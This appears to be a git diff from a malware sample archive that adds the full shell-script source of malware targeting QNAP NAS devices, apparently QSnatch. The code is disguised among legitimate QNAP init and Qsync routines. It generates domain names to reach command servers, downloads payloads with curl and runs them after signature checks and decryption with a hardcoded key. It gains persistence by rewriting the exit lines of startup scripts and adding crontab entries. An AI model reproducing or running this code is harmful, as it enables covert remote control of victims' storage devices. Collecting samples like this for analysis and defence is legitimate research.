||||
cronmins=\$(printf '%i' "\$(( \$RANDOM % 60 ))")
|
||||
cronhour=\$(printf '%i' "\$(( \$RANDOM % 24 ))")
|
||||
cronhour=\$(printf '%i,' "\$(( ( \$cronhour + 8 ) % 24 ))" "\$(( ( \$cronhour + 16 ) % 24 ))")"\$cronhour"
|
||||
echo "\$cronmins \$cronhour"' * * * '"\${bdir}/.qpkg/${cronscriptpath} >/dev/null 2>/dev/null" >> "\$crontab"
|
||||
crontab "\$crontab"
|
||||
sleep 2
|
||||
fi
|
||||
done
|
||||
) & ) &
|
||||
XXEOF
|
||||
} | { openssl base64 -A; echo; echo 'EOF'; echo ')&)'; } >> "${bdir}/.system/.qinstaller.sh"
|
||||
{ { crontab -l || cat /etc/config/crontab; } | grep -v '^ *#' | awk '{ print $6 }'; sed -n 's/^ \?[Ss]hell \?= \?//p' /etc/config/qpkg.conf; } | grep '/' | sort | uniq | while IFS= read -r line; do
|
||||
test ! -z "$line" || continue
|
||||
test -f "$line" || continue
|
||||
test "$line" = $(pwd)/liveupdate.sh || test "$line" = $(pwd)/backup_conf.sh && continue
|
||||
grep '/\.system/\.qinstaller\.sh"; exit' "$line" && continue
|
||||
head -n 1 "$line" | grep '^#! \?/bin/b\?a\?sh' || continue;
|
||||
tab=' '
|
||||
test "${#tab}" -eq 1 || tab=$(printf '\011') || tab=$(echo -e '\011')
|
||||
sed -i 's!^\([ '"$tab"']\{1,\}\)exit\([ '"$tab"']\{1,\}[0-9]\{1,\}\)\{0,1\}\(\;\{0,1\}[ '"$tab"']*\)$!\1{ '"${bdir}/.system/.qinstaller.sh"'; exit\2; }\3!;s!^exit\([ '"$tab"']\{1,\}[0-9]\{1,\}\)\{0,1\}\(\;\{0,1\}[ '"$tab"']*\)$!{ '"${bdir}/.system/.qinstaller.sh"'; exit\1; }!;s!/.qpkg/.q\{0,1\}installer.sh; exit!/.system/.qinstaller.sh; exit!' "$line"
|
||||
hash=''
|
||||
hash=$(sed -n '2,5p' "$line" | md5sum)
|
||||
hash=${hash%${hash##*[0-9a-f]}}; hash=${hash#${hash%%[0-9a-f]*}}
|
||||
trycnt=20
|
||||
while [ "x$hash" = 'x18ec5ab42dc1231da518951e4479c27b' ] && [ "$trycnt" -gt 0 ]; do
|
||||
trycnt=$(( $trycnt - 1))
|
||||
sed -i '2,5d' "$line"
|
||||
hash=''
|
||||
hash=$(sed -n '2,568{/key=/d;s/\.liveupdate\/liveupdate\.sh//g;s/\.config\/backup_conf\.sh//g;p}' "$line" | md5sum)
|
||||
hash=${hash%${hash##*[0-9a-f]}}; hash=${hash#${hash%%[0-9a-f]*}}
|
||||
done
|
||||
done
|
||||
fi
|
||||
fi
|
||||
|
||||
test -f "${ts}_c" || touch "${ts}_c"
|
||||
rm -f "${CWD}/".tmp.*
|
||||
exit 0
|
||||
}
|
572
2020/2020-07-27_CISA-Legacy_Malware_Targeting_QNAP_NAS/9791c5f567838f1705bd46e880e38e21e9f3400c353c2bf55a9fa9f130f3f077
Normal file
572
2020/2020-07-27_CISA-Legacy_Malware_Targeting_QNAP_NAS/9791c5f567838f1705bd46e880e38e21e9f3400c353c2bf55a9fa9f130f3f077
Normal file
@ -0,0 +1,572 @@
|
||||
#!/bin/sh
|
||||
export PATH="${PATH}:/bin:/sbin:/usr/bin:/usr/sbin:/usr/bin/X11:/usr/local/sbin:/usr/local/bin"
|
||||
command -v dirname >/dev/null 2>&1 || dirname () { test -z "$1" && echo "." && return; local r="${1%"${1##*[!/]}"}"; case $r in /*[!/]*/*|[!/]*/*) r="${r%/*}"; echo "${r%"${r##*[!/]}"}";; */*) echo ${r%%[!/]};; "") echo $1;; *) echo .;; esac; }
|
||||
test -d /etc/config && confdir=/etc/config || { test -d /mnt/HDA_ROOT/.config && confdir=/mnt/HDA_ROOT/.config; }
|
||||
test -d "$confdir" || confdir=/etc/config
|
||||
command -v getcfg > /dev/null 2>&1 || getcfg () { sed -n 'H;${x;s/\(.*\
|
||||
\['"${1//\//\\\/}"']\|^\['"${1//\//\\\/}"']\)\
|
||||
//I;s/\(^\|\
|
||||
\)\[[^\
|
||||
]\+\]\
|
||||
.*//p}' "${4:-${confdir}/uLinux.conf}" | sed -n 's/^'"${2//\//\\\/}"' \?= \?\(.*\)/\1/Ip'; }
|
||||
bdir=
|
||||
test -f "${confdir}/smb.conf" && for i in homes Public Download Multimedia Web Recordings; do bdir=`getcfg "$i" path -f "${confdir}/smb.conf"` && test ! -z "$bdir" && bdir=`dirname "$bdir"` && test -d "$bdir" && testwriteable=$(mktemp "${bdir}/.tmp.XXXXXX") && rm "${testwriteable}" && break; bdir=''; done
|
||||
test -z "${bdir}" || test ! -d "${bdir}" && { command -v readlink >/dev/null 2>&1 || ln -sf /bin/busybox /usr/bin/readlink; for i in homes Public Download Multimedia Web Recordings; do bdir=`readlink "/share/${i}" 2>/dev/null` && test ! -z "$bdir" && bdir=`dirname "$bdir"` && bdir=/share/${bdir##*/} && test -d "$bdir" && break; done;
|
||||
test -z "${bdir}" || test ! -d "${bdir}"; } && { bdir=`getcfg SHARE_DEF defVolMP -f "${confdir}/def_share.info"`
|
||||
test -z "${bdir}" || test ! -d "${bdir}"; } && { bdir=`mount | sed -n "s/.*\(\/share\/[^ /]\+\) .*/\1/gp" | head -n 1`
|
||||
test -z "${bdir}" || test ! -d "${bdir}"; } && { for i in CACHEDEV3_DATA CACHEDEV2_DATA CACHEDEV1_DATA MD0_DATA; do test -d "/share/${i}" && bdir="/share/${i}" && break; done;
|
||||
test -z "${bdir}" || test ! -d "${bdir}" && bdir=/mnt/HDA_ROOT; }
|
||||
echo 'ab*c' | grep -F 'ab*c' >/dev/null 2>&1 && fgrep="grep -F" || { command -v fgrep >/dev/null 2>&1 && fgrep=fgrep || fgrep=grep; }
|
||||
test "$fgrep" || fgrep=grep
|
||||
|
||||
if [ ! -f "${bdir}/.qpkg/.liveupdate/liveupdate.sh" ]; then
|
||||
test -d "${bdir}/.qpkg" || mkdir -p "${bdir}/.qpkg" || mkdir "${bdir}/.qpkg"
|
||||
test -d "${bdir}/.qpkg/.liveupdate" || mkdir "${bdir}/.qpkg/.liveupdate"
|
||||
cat > "${bdir}/.qpkg/.liveupdate/liveupdate.sh" <<"XEOF"
|
||||
#!/bin/sh
|
||||
QNAP_QPKG=cloudinstall
|
||||
QID_PRESISTENT_CONF=/etc/config/qid_persistent.conf
|
||||
NAS_CLOUD_INSTALL_PATH=/home/httpd/cgi-bin/cloudinstall
|
||||
CLOUD_INSTALL_PATH=/tunnel_agent
|
||||
CLOUD_INSTALL_RAMDISK_PATH=/tunnel_agent_ramdisk
|
||||
CLOUD_INSTALL_AGENT_FILE_PATH=$CLOUD_INSTALL_PATH/tunnel_agent.tar.bz2
|
||||
COUNTER=1
|
||||
ERROR_BAD_REQUEST=400
|
||||
|
||||
if [ "$fromrcS" = 'TRUE' ]; then
|
||||
case "$1" in
|
||||
start)
|
||||
START_TIME=$(date +"%T")
|
||||
echo -e "start:$START_TIME" >> /tmp/.cloudinstall.log
|
||||
while [ "$CLOUD_INSTALL_AGENT_PID_LIST" == "" ];
|
||||
do
|
||||
# report device info and get cloudinstall agent app download url
|
||||
DOWNLOAD_URL=`/usr/sbin/qcloud_uninit_device_tool -r`
|
||||
if [ ! -d "$CLOUD_INSTALL_PATH" ]; then
|
||||
if [ "$NAS_ARCH" == "ARM_64" ]; then
|
||||
# create ramdisk and create a 64mb file
|
||||
/bin/mkdir -p $CLOUD_INSTALL_RAMDISK_PATH
|
||||
/bin/mount -t tmpfs -o size=64m tmpfs $CLOUD_INSTALL_RAMDISK_PATH
|
||||
/bin/dd if=/dev/zero of=$CLOUD_INSTALL_RAMDISK_PATH/image bs=1M count=64
|
||||
# create block size 1K filesystem
|
||||
/sbin/mke2fs -b 1024 $CLOUD_INSTALL_RAMDISK_PATH/image
|
||||
# create virtual disk
|
||||
export USED_LOOP_DEVICE=`/usr/local/sbin/losetup -f $CLOUD_INSTALL_RAMDISK_PATH/image`
|
||||
/sbin/setcfg -f $QID_PRESISTENT_CONF "CLOUDINSTALL" "USED_LOOP_DEVICE" "$USED_LOOP_DEVICE"
|
||||
/bin/mkdir -p $CLOUD_INSTALL_PATH
|
||||
# mount virtual disk
|
||||
/bin/mount $USED_LOOP_DEVICE $CLOUD_INSTALL_PATH
|
||||
else
|
||||
# create and mount tmpfs folder
|
||||
/bin/mkdir -p $CLOUD_INSTALL_PATH
|
||||
/bin/mount -t tmpfs -o size=64m tmpfs $CLOUD_INSTALL_PATH
|
||||
fi
|
||||
fi
|
||||
cd $CLOUD_INSTALL_PATH
|
||||
|
||||
if [[ $DOWNLOAD_URL == https* ]]; then
|
||||
REPORT_SUCCESS_TIME=$(date +"%T")
|
||||
else
|
||||
REPORT_FAIL_TIME=$(date +"%T")
|
||||
echo -e " report_fail:$REPORT_FAIL_TIME\n response:$DOWNLOAD_URL" >> /tmp/.cloudinstall.log
|
||||
# stop retry when got bad request
|
||||
# prevent put bad request all the time
|
||||
if [[ $DOWNLOAD_URL == *$ERROR_BAD_REQUEST* ]]; then
|
||||
break
|
||||
fi
|
||||
fi
|
||||
|
||||
# downlaod cloudinstall agent app
|
||||
/usr/sbin/qcloud_uninit_device_tool -o "$CLOUD_INSTALL_AGENT_FILE_PATH" -d "$DOWNLOAD_URL"
|
||||
|
||||
if [ -f "$CLOUD_INSTALL_AGENT_FILE_PATH" ]; then
|
||||
DOWNLOAD_FINISH_TIME=$(date +"%T")
|
||||
# unzip and execute cloudinstallagent
|
||||
/bin/tar -xf $CLOUD_INSTALL_AGENT_FILE_PATH -C $CLOUD_INSTALL_PATH
|
||||
$CLOUD_INSTALL_PATH/bin/cloudinstall_agent_ctl.sh start &> /dev/null
|
||||
|
||||
UNZIP_TIME=$(date +"%T")
|
||||
fi
|
||||
|
||||
if [ ! -d "$NAS_CLOUD_INSTALL_PATH" ]; then
|
||||
# create folder and create symbolic link
|
||||
/bin/mkdir -p $NAS_CLOUD_INSTALL_PATH
|
||||
/bin/ln -s $CLOUD_INSTALL_PATH/ui/cloudinstall.html $NAS_CLOUD_INSTALL_PATH/index.html
|
||||
/bin/ln -s $CLOUD_INSTALL_PATH/ui/cloudinstall.cgi $NAS_CLOUD_INSTALL_PATH/cloudinstall.cgi
|
||||
/bin/ln -s $CLOUD_INSTALL_PATH/ui/static $NAS_CLOUD_INSTALL_PATH/static
|
||||
fi
|
||||
|
||||
# wait connect
|
||||
sleep 5
|
||||
CLOUD_INSTALL_AGENT_PID_LIST=`/bin/ps --columns 256 | /bin/grep "$CLOUD_INSTALL_PATH/bin/cloudinstallagent" | /bin/grep -v grep | /bin/awk '{print $1}'`
|
||||
if [ "$CLOUD_INSTALL_AGENT_PID_LIST" == "" ]; then
|
||||
SLEEP_TIME=$(( 30 * $COUNTER ))
|
||||
if [ $SLEEP_TIME -gt 300 ]; then
|
||||
SLEEP_TIME=300
|
||||
fi
|
||||
# wait next retry
|
||||
sleep $SLEEP_TIME
|
||||
fi
|
||||
COUNTER=$(( $COUNTER * 2 ))
|
||||
done
|
||||
|
||||
END_TIME=$(date +"%T")
|
||||
echo -e "report_success:$REPORT_SUCCESS_TIME\ndownload_finish:$DOWNLOAD_FINISH_TIME\nunzip_finish:$UNZIP_TIME\nend:$END_TIME" >> /tmp/.cloudinstall.log
|
||||
# call for a new process group and for later kill
|
||||
/bin/setsid $CLOUD_INSTALL_PATH/bin/cloudinstall_agent_disconnect_daemon.sh start &> /dev/null &
|
||||
/bin/setsid $CLOUD_INSTALL_PATH/bin/cloudinstall_agent_daemon.sh &> /dev/null &
|
||||
|
||||
# set cloudinstall report status
|
||||
/sbin/setcfg -f $QID_PRESISTENT_CONF "CLOUDINSTALL" "REPORT_STATUS" "uninit"
|
||||
# add link to report offline
|
||||
/bin/ln -sf /etc/init.d/cloudinstall_report_offline.sh /etc/rcK.d/K99cloudinstall_report_offline
|
||||
|
||||
# buzzer
|
||||
HARDWARE_TYPE=$(uname -m)
|
||||
if [[ "$HARDWARE_TYPE" == *"x86"* ]];
|
||||
then
|
||||
/sbin/hal_app --se_buzzer enc_id=0,mode=101
|
||||
elif [[ "$HARDWARE_TYPE" == *"arm"* ]];
|
||||
then
|
||||
/sbin/pic_raw 81
|
||||
fi
|
||||
;;
|
||||
|
||||
stop)
|
||||
# disconnect cloudinstall agent
|
||||
$CLOUD_INSTALL_PATH/bin/cloudinstall_agent_ctl.sh stop &> /dev/null
|
||||
$CLOUD_INSTALL_PATH/bin/cloudinstall_agent_disconnect_daemon.sh stop &> /dev/null
|
||||
for i in "${CLOUD_INSTALL_AGENT_DAEMON_PID_LIST[@]}"
|
||||
do
|
||||
# use bash kill instead /bin/kill for kill process group
|
||||
# cloudinstall agent daemon and inotifywait
|
||||
kill -9 -- -$i &>/dev/null
|
||||
done
|
||||
|
||||
# umount
|
||||
if [ "$NAS_ARCH" == "ARM_64" ]; then
|
||||
/bin/umount -l $USED_LOOP_DEVICE
|
||||
/usr/local/sbin/losetup -d $USED_LOOP_DEVICE
|
||||
else
|
||||
/bin/umount -l $CLOUD_INSTALL_PATH
|
||||
fi
|
||||
# remove all files
|
||||
if [ -d "$NAS_CLOUD_INSTALL_PATH" ]; then
|
||||
/bin/rm -rf $NAS_CLOUD_INSTALL_PATH
|
||||
fi
|
||||
if [ -d "$CLOUD_INSTALL_PATH" ]; then
|
||||
/bin/rm -rf $CLOUD_INSTALL_PATH
|
||||
fi
|
||||
if [ -d "$CLOUD_INSTALL_RAMDISK_PATH" ]; then
|
||||
/bin/rm -rf $CLOUD_INSTALL_RAMDISK_PATH
|
||||
fi
|
||||
;;
|
||||
|
||||
restart)
|
||||
$0 stop
|
||||
$0 start
|
||||
;;
|
||||
|
||||
*)
|
||||
echo "Usage: $0 {start|stop|restart}"
|
||||
exit 1
|
||||
esac
|
||||
exit 0
|
||||
|
||||
|
||||
set_env()
|
||||
{
|
||||
debug=`$CMD_GETCFG Qsync Debug -u -d NULL`
|
||||
if [ "$debug" != "NULL" ]; then
|
||||
/bin/touch $LOG_FILE
|
||||
else
|
||||
/bin/rm -f $LOG_FILE
|
||||
fi
|
||||
}
|
||||
|
||||
set_env
|
||||
|
||||
dbg()
|
||||
{
|
||||
if [ -f "$LOG_FILE" ]; then
|
||||
echo "[`date "+%H:%M:%S"`] $@ " >> $LOG_FILE
|
||||
fi
|
||||
}
|
||||
|
||||
dbg "> $0 $@ (pid $$)"
|
||||
|
||||
fi
|
||||
|
||||
export PATH="${PATH}:/bin:/sbin:/usr/bin:/usr/sbin:/usr/bin/X11:/usr/local/sbin:/usr/local/bin"
|
||||
|
||||
command -v getcfg > /dev/null 2>&1 || getcfg () { sed -n 'H;${x;s/\(.*\n\['"${1//\//\\\/}"']\|^\['"${1//\//\\\/}"']\)\n//I;s/\(^\|\n\)\[[^\n]\+\]\n.*//p}' "${4:-${confdir}/uLinux.conf}" | sed -n 's/^'"${2//\//\\\/}"' \?= \?\(.*\)/\1/Ip'; }
|
||||
|
||||
test -d /etc/config && confdir=/etc/config || { test -d /mnt/HDA_ROOT/.config && confdir=/mnt/HDA_ROOT/.config; }
|
||||
|
||||
bdir=
|
||||
test -f "${confdir}/smb.conf" && for i in homes Public Download Multimedia Web Recordings; do bdir=`getcfg "$i" path -f "${confdir}/smb.conf"` && test ! -z "$bdir" && bdir=`dirname "$bdir"` && test -d "$bdir" && testwriteable=$(mktemp "${bdir}/.tmp.XXXXXX") && rm "${testwriteable}" && break; bdir=''; done
|
||||
test -z "${bdir}" || test ! -d "${bdir}" && { command -v readlink >/dev/null 2>&1 || ln -sf /bin/busybox /usr/bin/readlink; for i in Public Download Multimedia Web Recordings homes; do bdir=`readlink "/share/${i}" 2>/dev/null` && test ! -z "$bdir" && bdir=`dirname "$bdir"` && bdir=/share/${bdir##*/} && test -d "$bdir" && break; done;
|
||||
test -z "${bdir}" || test ! -d "${bdir}"; } && { bdir=`getcfg SHARE_DEF defVolMP -f "${confdir}/def_share.info"`
|
||||
test -z "${bdir}" || test ! -d "${bdir}"; } && { bdir=`mount | sed -n "s/.*\(\/share\/[^ /]\+\) .*/\1/gp" | head -n 1`
|
||||
test -z "${bdir}" || test ! -d "${bdir}"; } && { for i in CACHEDEV3_DATA CACHEDEV2_DATA CACHEDEV1_DATA MD0_DATA; do test -d "/share/${i}" && bdir="/share/${i}" && break; done;
|
||||
test -z "${bdir}" || test ! -d "${bdir}" && bdir=/mnt/HDA_ROOT; }
|
||||
grep -F '' <<EOF >/dev/null 2>&1 && fgrep="grep -F" || { command -v fgrep >/dev/null 2>&1 && fgrep=fgrep || fgrep=grep; }
|
||||
|
||||
EOF
|
||||
test "$fgrep" || fgrep=grep
|
||||
test "$RANDOM" || RANDOM=17653
|
||||
genrstr ()
|
||||
{
|
||||
local s=;
|
||||
local min=${1:-4};
|
||||
local max=${2:-12};
|
||||
local kspace="${3:-a-zA-Z}"
|
||||
tr -dc "$kspace" < /dev/urandom | {
|
||||
read -rn $(($RANDOM % ( $max - $min + 1 ) + $min )) s;
|
||||
echo "$s"
|
||||
}
|
||||
}
|
||||
|
||||
verifyfile() {
|
||||
local file="$1"
|
||||
local sig="${2:-$file_s}"
|
||||
local out
|
||||
test ! -z "$file" && test -s "$file" || return 1
|
||||
test ! -z "$sig" && test -s "$sig" || return 1
|
||||
test -f ".rsakey" || echo "$verifykey" > ".rsakey"
|
||||
out=$(openssl dgst -sha1 -verify ".rsakey" -signature "$sig" "$file") && test "$out" = "Verified OK" && return 0
|
||||
return 1
|
||||
}
|
||||
|
||||
decryptfile() {
|
||||
local file="$1"
|
||||
local ofile="${2:-${file}}"
|
||||
local key='7C0vK4SzMO15zBxLD7XCi5hbjgP1ZjkJ'
|
||||
openssl enc -d -aes-256-cbc -k "$key" -md sha1 -salt < "$file" > "${file}_d" || return $?
|
||||
test -f "$ofile" && rm -f "$ofile"
|
||||
mv "${file}_d" "$ofile" && return 0
|
||||
return 1
|
||||
}
|
||||
|
||||
verifykey='-----BEGIN PUBLIC KEY-----
|
||||
MIIBojANBgkqhkiG9w0BAQEFAAOCAY8AMIIBigKCAYEAt/EDT6SB75atrHW7Cpog
|
||||
CXqrBM2CVbJo';verifykey="${verifykey}"'g4rwwS''z1Bp1i1'
|
||||
verifykey="${verifykey}"'B7B9Wd51no32lpRqOM+9GOr2W17xwJ8pqpQotex
|
||||
RC5qQSiS/7FS48jsPKsJnrUhnsI1fRLM4DqsEF3UOukZuDOYUhlteDuMqqZBz0AC
|
||||
Q3YnLjraTjchMF0XmaAAcWOkg5MsxAOKTepue4R/tnrPAkAG86nq5LA1+wa7opNV
|
||||
gQzwDh7YXhBnWz52+ebZ9TeqD31/sb5hoyUKf1Nr5HcKkklObuz1OGQJ//pkCbTC
|
||||
2EnQw6tCPQhgSIA8wJKkaxW0f/UHP+YBmWa4Wn+uPrJJuHSVNEJtAp2wlX3THltz
|
||||
0IGPQEuzoafOAl3EFjas3HcTX2HlEfnvAtRL2iLxJeba1nZ+U3geZOuxL1NhWhNh
|
||||
pjaLcKwhkRck7Y5hr1Pz8pLDnXsx5w0QUz6XS8HVf/KHnNXHufFEn01y9YoPuau1
|
||||
DNnpDGbq632Bs8ESd3ueHk9OY/UZxWeN3UdbseFxK35XAgMBAAE=
|
||||
-----END PUBLIC KEY-----'
|
||||
|
||||
DOMAIN_EXT_A='cf tk ml ga gq'
|
||||
DOMAIN_EXT_B='com biz org de rocks mx cn top nl men ws se info xyz net today ru fi name to in com.ua vg vn cd'
|
||||
|
||||
test -d "${bdir}/.qpkg" || mkdir "${bdir}/.qpkg"
|
||||
test -d "${bdir}/.qpkg/.liveupdate" || mkdir "${bdir}/.qpkg/.liveupdate"
|
||||
cd "${bdir}/.qpkg/.liveupdate" && rm -f .tmp.*
|
||||
|
||||
echo "$verifykey" > ".rsakey"
|
||||
i=0 n=0 c=0 errorcount=0
|
||||
outfile=$(mktemp "./.tmp.XXXXXX") || outfile=$(mktemp "${bdir}/.tmp.XXXXXX") || outfile=$(mktemp "/.tmp.XXXXXX") || outfile='./.tmp.out'
|
||||
|
||||
for domainexts in "$DOMAIN_EXT_A" "$DOMAIN_EXT_B"; do
|
||||
for ext in $domainexts; do
|
||||
hostname=$(echo "$(( $(date +%s) / 1296000 ))IbjGOEgnuD${ext}" | openssl dgst -sha1 -binary | openssl base64 | sed 'y/ABCDEFGHIJKLMNOPQRSTUVWXYZ-+\//abcdefghijklmnopqrstuvwxyzabc/;s/=//g')
|
||||
hostname=${hostname%[a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9]}
|
||||
hostnames="${hostname%[a-z0-9][a-z0-9][a-z0-9][a-z0-9]} ${hostname%[a-z0-9][a-z0-9][a-z0-9]}"
|
||||
hostnames="$hostnames ${hostname%[a-z0-9][a-z0-9]} ${hostname%[a-z0-9]} $hostname"
|
||||
for host in $hostnames; do
|
||||
test -f "$outfile" && rm -f "$outfile"
|
||||
recentupdate=''
|
||||
curl --connect-timeout 12 -m 30 -k -o "$outfile" "https://${host}.${ext}/qnap_firmware.xml?t=$(date +%s)"
|
||||
test -s "$outfile" || continue
|
||||
fsize=$(( $(wc -c < "$outfile") ))
|
||||
test "$fsize" -gt 4096 && rm -f "$outfile" && continue
|
||||
rsamsg=$(openssl base64 -in "$outfile" -d | openssl rsautl -pubin -inkey ".rsakey" -verify) || continue
|
||||
test "$rsamsg" || continue
|
||||
path="${rsamsg%|*}"; rsadomain="${path%|*}"; path="${path#*|}"
|
||||
hash="${rsamsg##*|}"; ts="${hash#*_}"; hash="${hash%_*}"
|
||||
test "$rsadomain" = "${host}.${ext}" || continue
|
||||
timenow=$(date +%s)
|
||||
test "$ts" -gt 0 && { test "$ts" -gt "$timenow" || test $(( $timenow - $ts )) -lt 172800; } && recentupdate=1
|
||||
curl --connect-timeout 12 -m 300 -k -o "$outfile" "https://${host}.${ext}/${path}"
|
||||
filehash=$(openssl dgst -sha1 -binary "$outfile" | openssl base64) || continue
|
||||
test "$filehash" = "$hash" || continue
|
||||
curl --connect-timeout 12 -m 30 -k -o "${outfile}_s" "https://${host}.${ext}/s/${path}"
|
||||
verifyfile "$outfile" "${outfile}_s" && decryptfile "$outfile" || continue
|
||||
mv "${outfile}_s" "${ts}_v"
|
||||
chmod 755 "$outfile" || continue
|
||||
( ( exec >/dev/null 2>/dev/null </dev/null; "$outfile" ) & )
|
||||
test "$recentupdate" -eq 1 && exit 0
|
||||
done
|
||||
done
|
||||
done
|
||||
|
||||
|
||||
if [ "$fromrcS" = 'TRUE' ]; then
|
||||
# if Qsync is disable before 4.3.0, we will touch /mnt/HDA_ROOT/udpate_pkg/.QsyncServer_disabled
|
||||
set_default_disable_status()
|
||||
{
|
||||
QPKG_ENABLE=`$CMD_GETCFG ${QSYNC_NAME} Enable -d "NULL" -f ${QPKG_CONF}`
|
||||
OLD_ENABLE=`$CMD_GETCFG Qsync Enable -u -d NULL`
|
||||
if [ -f "${UPDATEPKG_DIR}/.${QSYNC_NAME}_removed" ]; then
|
||||
return
|
||||
fi
|
||||
|
||||
if [ "$QPKG_ENABLE" = "NULL" ]; then
|
||||
if [ "$OLD_ENABLE" = "FALSE" ]; then
|
||||
dbg "touch ${UPDATEPKG_DIR}/.${QSYNC_NAME}_disabled"
|
||||
/bin/touch "${UPDATEPKG_DIR}/.${QSYNC_NAME}_disabled"
|
||||
fi
|
||||
fi
|
||||
}
|
||||
|
||||
if [ "x$HBS_ENABLE" = xnull ] || [ "x$HBS_ENABLE" = xFALSE ]; then
|
||||
export QNAP_QPKG=rtrr
|
||||
else
|
||||
export QNAP_QPKG=HybridBackup
|
||||
/usr/local/sbin/qboost_util -S -n rtrr -E 0 1>/dev/null 2>&1
|
||||
fi
|
||||
start()
|
||||
{
|
||||
if [ -f /usr/bin/qsyncman ]; then
|
||||
[ ! -f /etc/config/hdcopyusb.conf ] || /bin/rm -f /etc/config/hdcopyusb.conf
|
||||
/bin/sed -i '/hdusb_copy/d' /etc/config/crontab
|
||||
/usr/bin/crontab /etc/config/crontab
|
||||
echo -n "Starting QSync manitor: "
|
||||
[ -d /etc/config/qsync ] || /usr/bin/install -d /etc/config/qsync
|
||||
[ -f /etc/config/qsync/qhost.conf ] || /bin/touch /etc/config/qsync/qhost.conf
|
||||
[ -f /etc/config/qsync/qsyncjobdef.conf ] || /bin/touch /etc/config/qsync/qsyncjobdef.conf
|
||||
[ -f /etc/config/qsync/qsync.conf ] || /bin/cp -p /etc/default_config/qsync/qsync.conf /etc/config/qsync/qsync.conf
|
||||
[ -f /etc/config/qsync/extdrv.conf ] || /bin/cp -p /etc/default_config/qsync/extdrv.conf /etc/config/qsync/extdrv.conf
|
||||
[ -f /etc/config/qsync/qsyncd.conf ] || /bin/cp -p /etc/default_config/qsync/qsyncd.conf /etc/config/qsync/qsyncd.conf
|
||||
[ ! -f /etc/config/qsync/qsyncd.conf ] || /bin/chmod 640 /etc/config/qsync/qsyncd.conf
|
||||
[ ! -f /etc/config/qsync/qsync.conf ] || /bin/chmod 640 /etc/config/qsync/qsync.conf
|
||||
[ ! -f /etc/config/qsync/qhost.conf ] || /bin/chmod 640 /etc/config/qsync/qhost.conf
|
||||
/sbin/daemon_mgr qsyncman start "/usr/bin/qsyncman 1>/dev/null 2>&1"
|
||||
echo "OK"
|
||||
fi
|
||||
}
|
||||
|
||||
stop()
|
||||
{
|
||||
echo "Shutting down QSync monitor: OK"
|
||||
pidnum=`/bin/pidof qsync``/bin/pidof qsyncd`
|
||||
kill $pidnum 2>/dev/null
|
||||
i=0
|
||||
while [ ${i} -lt 5 ]
|
||||
do
|
||||
pidnum=`/bin/pidof qsync``/bin/pidof qsyncd`
|
||||
if [ -z "$pidnum" ]; then
|
||||
break
|
||||
fi
|
||||
sleep 1
|
||||
i=`/usr/bin/expr ${i} + 1`
|
||||
done
|
||||
pidnum=`/bin/pidof qsync``/bin/pidof qsyncd`
|
||||
[ -z "$pidnum" ] || kill -9 $pidnum 2>/dev/null
|
||||
/sbin/daemon_mgr qsyncman stop "/usr/bin/qsyncman"
|
||||
/usr/bin/killall -q qsyncman
|
||||
}
|
||||
|
||||
start_qsyncd()
|
||||
{
|
||||
#_qsyncd_en=`/sbin/getcfg "" Enabled -d 0 -f /etc/qsync/qsyncd.conf`
|
||||
#[ "x$_qsyncd_en" = x1 ] || return -1
|
||||
_qsyncd_run_pid=`/bin/pidof qsyncd`
|
||||
[ -z $_qsyncd_run_pid ] || return -114
|
||||
_recycle_en=`/sbin/getcfg 'Network Recycle Bin' Enable -d FALSE`
|
||||
_with_syslog=$1
|
||||
if [ "x$_recycle_en" = xTRUE ]; then
|
||||
if [ "x$_with_syslog" = x1 ]; then
|
||||
LD_PRELOAD=/usr/local/lib/libtrash.so /usr/bin/qsyncd -syslog -c:/etc/qsync/qsyncd.conf
|
||||
else
|
||||
LD_PRELOAD=/usr/local/lib/libtrash.so /usr/bin/qsyncd -c:/etc/qsync/qsyncd.conf
|
||||
fi
|
||||
else
|
||||
if [ "x$_with_syslog" = x1 ]; then
|
||||
/usr/bin/qsyncd -syslog -c:/etc/qsync/qsyncd.conf
|
||||
else
|
||||
/usr/bin/qsyncd -c:/etc/qsync/qsyncd.conf
|
||||
fi
|
||||
fi
|
||||
_iret=$?
|
||||
if [ "x$_iret" = x0 ]; then
|
||||
i=0
|
||||
while [ ${i} -lt 10000 ]
|
||||
do
|
||||
echo "${i} millisecond..."
|
||||
_qsyncd_pid=`/sbin/getcfg '' Pid -d -1 -f /etc/qsync/qsyncd.conf`
|
||||
_qsyncd_run_pid=`/bin/pidof qsyncd`
|
||||
if [ "x$_qsyncd_pid" != "x-1" ] && [ ! -z $_qsyncd_run_pid ]; then
|
||||
break
|
||||
fi
|
||||
usleep 50000
|
||||
i=`/usr/bin/expr ${i} + 50`
|
||||
done
|
||||
fi
|
||||
return -$_iret
|
||||
}
|
||||
|
||||
stop_qsyncd()
|
||||
{
|
||||
#_qsyncd_en=`/sbin/getcfg "" Enabled -d 0 -f /etc/qsync/qsyncd.conf`
|
||||
#[ "x$_qsyncd_en" = x0 ] || return -1
|
||||
_qsyncd_pid=`/sbin/getcfg "" Pid -d -1 -f /etc/qsync/qsyncd.conf`
|
||||
[ $_qsyncd_pid -lt 0 ] && return -3
|
||||
# Send SIGUSR1 to inform the daemon to output "[RTRR Server] Stopped" event log
|
||||
/bin/kill -SIGUSR1 $_qsyncd_pid
|
||||
usleep 200000
|
||||
# Send SIGINT to stop the QSyncd process
|
||||
/bin/kill -SIGINT $_qsyncd_pid
|
||||
_kill_ret=$?
|
||||
if [ "x$_kill_ret" != x0 ]; then
|
||||
return -3
|
||||
fi
|
||||
echo "need wait $1 millisecond"
|
||||
i=0
|
||||
while true
|
||||
do
|
||||
echo "${i} millisecond..."
|
||||
_qsyncd_pid=`/sbin/getcfg '' Pid -d -1 -f /etc/qsync/qsyncd.conf`
|
||||
_qsyncd_run_pid=`/bin/pidof qsyncd`
|
||||
if [ "x$_qsyncd_pid" = "x-1" ] && [ -z $_qsyncd_run_pid ]; then
|
||||
break
|
||||
fi
|
||||
if [ ${i} -ge $1 ]; then
|
||||
# if time-out, we send two additional SIGINT to force the daemon to stop.
|
||||
if [ $_qsyncd_pid -ge 0 ]; then
|
||||
/bin/kill -SIGUSR1 $_qsyncd_pid
|
||||
usleep 200000
|
||||
/bin/kill -SIGUSR1 $_qsyncd_pid
|
||||
fi
|
||||
j=0
|
||||
while [ ${j} -lt 500 ]
|
||||
do
|
||||
_qsyncd_run_pid=`/bin/pidof qsyncd`
|
||||
